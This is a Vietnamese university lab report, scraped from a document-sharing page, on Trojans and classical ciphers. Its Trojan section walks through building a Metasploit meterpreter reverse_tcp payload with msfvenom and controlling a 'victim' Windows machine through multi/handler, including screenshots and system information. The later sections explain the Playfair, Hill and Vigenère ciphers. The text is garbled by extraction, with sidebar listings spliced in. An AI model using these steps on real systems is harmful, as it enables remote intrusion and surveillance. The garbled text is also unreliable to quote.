1. Trang chủ
  2. » Giáo Dục - Đào Tạo

(Tiểu luận) an toàn và bảo mật hệ thống thông tin trojan (hay trojan horse)

19 4 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề An Toàn Và Bảo Mật Hệ Thống Thông Tin Trojan (Hay Trojan Horse)
Tác giả Nhóm 18
Người hướng dẫn Giảng Viên
Trường học Học Viện Công Nghệ Bưu Chính Viễn Thông
Chuyên ngành Công Nghệ Thông Tin
Thể loại tiểu luận
Định dạng
Số trang 19
Dung lượng 9,94 MB

Nội dung

Giới thiệuTrojan hay Trojan horse, trước hết là một chương trình độc hại cho máy tính, được ngụy trang bằng một vỏ bọc tưởng chừng vô hại để tạo tin tưởng cho ngườidùng, từ đó sử dụng và

BÔ GIO DC V ĐO TO HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CƠNG NGHỆ THƠNG TIN 🙟🕮🙝 BO CO AN TOÀN VÀ BẢO MẬT HỆ THỐNG THƠNG TIN NHĨM 18 Thành viên nhóm: Giảng viên: -oOo - (LAB3_ Buổi 4)Trojan house: Giới thiệu Trojan (hay Trojan horse), trước hết chương trình độc hại cho máy tính, ngụy trang vỏ bọc tưởng chừng vô hại để tạo tin tưởng cho người dùng, từ sử dụng vơ tình máy tính bị nhiễm trojan, bị thu thập liệu từ bên thứ để phục vụ cho mục đích xấu Trojan lấy từ điển tích ngựa thành Troia thần thoại Hy Lạp Nội dung điển tích kể thông minh người Hy Lạp ẩn nấp vô số chiến binh thân ngựa gỗ khổng lồ, khiến kẻ địch lầm tưởng chiến tích thu mà chủ quan, giúp quân Hy Lạp chiếm thành dễ dàng Điều giống cách thức hoạt động trojan Cách hoạt động Trojan ẩn nhiều hình thức khác từ hát, phần mềm, hình ảnh, link tải, quảng cáo trơng chúng an tồn, hợp pháp để người dùng tải xuống máy tính hay cần click chuột vào Khi phần mềm gián điệp nhanh chóng xâm nhập vào hệ thống máy tính, chờ tín hiệu người muốn xâm nhập máy tính sau để khống chế tồn liệu cá nhân người dùng Khác với virus công trực tiếp dễ bị phần mềm antivirus phát hiện, trojan cơng chương trình, phần mềm khác đuôi exe,.com,.scr,.bat, Trojan phần mềm thông thường không tự lây lan Thực hành Sử dụng framework metasploit Bước 1: Mở công cụ metasploit Msfvenom Sau nhập, Terminal hiển thị danh sách thao tác Xem payload( liệt kê payload có sẵn ): msfvenom -l payloads Sử dụng payload windows/x64/meterpreter/reverse_tcp Lý do: cho phép nhập keylog, tìm kiếm data, kiểm sốt hệ thống tệp, micro webcam máy victim > payload linh hoạt, khả xâm lấn tàn phá metaploit Kiểm tra tùy chọn, xem thông tin khai thác: Msfvenom list-options -p windows/x64/meterpreter/reverse_tcp LHOST ( local host ): Đây địa IP máy attacker LPORT: Đây cổng LHOST mà attacker muốn máy victim kết nối đến *Tiến hành tạo Trojan: Lệnh: msfvenom -p [payload] LHOST=[ attacker’s ip address ] LPORT=[ the port number ] -f [ file type ] > [path ] Trojan tạo! Điều khiển Trojan Meterpreter: Dùng lệnh: use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost [ attacker’s ip address ] Document continues below Discover more An toàn Bảo from: mật Hệ thống… INT1303 Học viện Công ng… 32 documents Go to course ATTT2-2p - ATTT227 226 2p An toàn Bảo mật… 100% (1) Giáo trình sở an tồn thơng tin - thầ… An toàn Bảo mật… 100% (1) 2023 cloud security 24 report checkpoint… An toàn Bảo mật Hệ… None An introduction to 126 windows operating… An toàn Bảo mật Hệ… None Lab 04 - Decrypting TLS with Wireshark An toàn Bảo mật Hệ… None Lab 06 - Pcap Tệp nằm máy victim: Tệp nằm máy win 10x64bit có: Khởi động tệp: Dùng lệnh help để xem thao tác sử dụng máy victim Thao tác máy victim: Sysinfo: xem thơng tin máy victim Strings and Carving… An tồn Bảo mật Hệ… None Screenshot: chụp hình (Buổi 5: lab 1): lập trình thuật tốn playfair cipher - Mật mã đa ký tự (mỗi lần mã ký tự liên tiếp nhau) - Giải thuật dựa ma trận chữ 5×5 xây dựng từ khóa (chuỗi ký tự) Xây dựng ma trận khóa + Lần lượt thêm ký tự khóa vào ma trận + Nếu ma trận chưa đầy, thêm ký tự lại bảng chữ vào ma trận theo thứ tự A - Z + I J la xem ký tự + Các ký tự ma trận không trùng - Giải thuật mật mã hóa Mã hóa cặp “2 ký tự” liên tiếp Nếu ký tự giống thêm ký tự ‘x’ vào VD: balloon tách thành ba lx lo on (vì ll lx l) Nếu dư ký tự thêm vào ký tự ‘q’ vào cuối VD: hat tq Nếu ký tự nằm dòng thay ký tự tương ứng bên phải Ký tự cột cuối thay ký tự cột Nếu ký tự nằm cột thay ký tự bên Ký tự hàng cuối thay ký tự hàng Nếu ký tự lập thành hình chữ nhật thay ký tự tương ứng dịng hai góc cịn lại (Buổi 5: lab 2): lập trình thuật tốn hill cipher Mật Mã Hill đề xuất Lester.S.Hill năm 1929 Mã thực m ký tự ký tự mã tổ hợp tuyến tính (trên vành Z26) m ký tự rõ Khoá cho ma trận cấp m, tức phần tử Z26mxm (Bài 3- Buổi 5)THUẬT TON VIGENERE CIPHER Có thể bẻ khóa Autokey Book cipher cách phân tích tần số cặp chữ khóa mã hoá nguồn viết ngơn ngữ Thay sử dụng bảng tần số cho 26 ký tự có độ dài 26 ‹ 1, ta sử dụng bảng tần số 26 ‹ 26 áp dụng cho “tần số xuất ký tự X mã hoá ký tự Y” Một phương pháp thám mã nhà mật mã học người Đức Friedrich Kasiski (1805-1881) đề xuất cách tìm kiếm đoạn lặp lại mã để dự đoán độ dài từ khố Từ xác định tồn nội dung từ khố phương pháp thám mã áp dụng cho kỹ thuật thay đơn từ Khóa: dãy m số nguyên: K = (K[0], K[1], , K[m-1]) Mật hóa: Mật hóa ký tự rõ Ký tự thứ i rõ (p[i]) mã hóa thành C[i] = (p[i] + k[i mod m] ) mod 26 Giải mật: Thảo luận Mật mã Vigenère Ví dụ: Từ khóa “Lemon” Bản rõ: ATTACKATDAWN Mật mã Vigenère phương pháp tra bảng Ghép khóa cho chiều dài khóa chiều dài bảng rõ: Ví dụ với từ khóa “Lemon” Bản rõ: ATTACKATDAWN Khóa : LEMONLEMONLE More from: An toàn Bảo mật Hệ thống thơng tin INT1303 Học viện Cơng nghệ Bưu Viễn thông 32 documents Go to course ATTT2-2p - ATTT2-2p 27 226 An tồn Bảo mật Hệ thống thơng tin Giáo trình sở an tồn thơng tin - thầy N Khanh Văn An tồn Bảo mật Hệ thống thơng tin 2023 cloud security report checkpoint fin 24 An toàn Bảo mật Hệ thống thông tin An introduction to windows operating sys 126 An toàn Bảo mật Hệ thống thông tin Recommended for you Chuyên đề đáp án https://www.studocu.com/vn/document/ Triết học Mác Lê nin Correctional Administration Criminology English - huhu 10 Led hiển thị Preparing Vocabulary FOR UNIT 10 Led hiển thị

Ngày đăng: 26/12/2023, 04:54

w